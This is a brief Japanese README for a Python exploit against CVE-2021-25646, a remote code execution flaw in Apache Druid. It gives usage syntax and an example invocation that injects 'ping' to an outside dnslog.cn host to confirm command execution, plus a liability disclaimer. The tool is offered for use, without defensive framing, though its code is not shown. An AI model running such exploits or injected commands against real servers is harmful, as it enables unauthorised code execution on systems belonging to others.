
Apache Druidのリモートコード実行の脆弱性CVE-2021-25646に対するPythonエクスプロイト。細工されたHTTPリクエストによるコマンドインジェクションを可能にします。
著者: j2ekim
python exp.py -u [--url] -c [--command]
python cve-2021-25646.py -u http://127.0.0.1:8888 -c "ping 5ap7ta.dnslog.cn"

https://www.adminxe.com/2109.html
このツールの伝播・利用によって生じたいかなる直接的または間接的な結果や損害についても、すべて利用者本人の責任とし、作者は一切の責任を負いません。